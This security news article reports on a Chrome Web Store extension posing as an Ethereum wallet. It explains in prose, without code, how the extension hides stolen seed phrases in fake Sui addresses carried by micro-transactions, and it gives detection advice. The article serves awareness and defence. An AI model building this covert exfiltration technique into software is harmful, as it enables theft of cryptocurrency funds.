Beware of Malicious Chrome Extension Masquerading as an Ethereum Wallet
What’s Happening?
Recent findings from cybersecurity experts have unveiled a deceptive Chrome extension that pretends to be a legitimate Ethereum wallet but is, in fact, a sophisticated piece of malware. Named “Safery: Ethereum Wallet,” this extension has made its way into the Chrome Web Store, claiming to be a secure solution for managing Ethereum cryptocurrency, complete with flexible settings. It was first uploaded on September 29, 2025, and received its most recent update on November 12. Alarmingly, it remains available for users to download.
The Deceptive Mechanics Behind Safery
The malicious behavior of this extension primarily revolves around the theft of users’ wallet seed phrases. Kirill Boychenko, a researcher at Socket, explained that while marketed as a straightforward Ethereum wallet, the extension discreetly integrates a backdoor to extract sensitive information. This is achieved by encoding the seed phrases into Sui addresses and then facilitating microtransactions from a wallet controlled by the threat actor.
How It Works
The malware embedded within the browser extension targets wallet mnemonic phrases. It accomplishes this by converting the seed phrases into fictitious Sui wallet addresses. Subsequently, it executes tiny transactions—0.000001 SUI—directed from a pre-set, hacker-controlled wallet.
The core strategy behind this malware is to disguise the theft of seed phrases within ostensibly ordinary blockchain transactions. By eliminating the need for a command-and-control (C2) server to retrieve this data, the attackers can efficiently send and collect information without raising immediate suspicion. Once the transaction processes, hackers can decode the recipient addresses to recover the original seed phrases, thereby allowing them to drain assets associated with the compromised wallets.
Security Analysis and Recommendations
In their assessment, Koi Security delineates how the extension’s operations facilitate the theft of seed phrases. By encoding these phrases into fake Sui addresses and monitoring blockchain activity, the hackers craftily siphon off funds from unwitting victims’ wallets.
To mitigate the risks posed by this fraudulent extension, cybersecurity experts recommend that users only utilize wallet extensions from reputable sources. Additionally, security teams should perform thorough scans on extensions to identify mnemonic encoders, synthetic address generators, and any hard-coded seed phrases. Blocking extensions that write on the blockchain during wallet creation or import is also advisable.
A Growing Threat Landscape
Boychenko underscores the evolving tactics that cybercriminals employ to bypass detection: “This technique allows threat actors to switch chains and RPC endpoints effortlessly. Therefore, traditional detections that depend on domains, URLs, or specific extension IDs may not catch these threats.” He advises treating any unexpected blockchain RPC calls from a browser—especially from products that claim to be single-chain—as significant indicators of potential malicious activity.
Conclusion
As cyber threats continue to evolve, awareness and vigilance are more critical than ever. Users are encouraged to be cautious when choosing browser extensions, particularly those related to cryptocurrency, and to stay informed about the latest security advisories. By prioritizing trusted resources and maintaining a healthy skepticism towards newer or lesser-known tools, individuals can better protect themselves from sophisticated online threats.
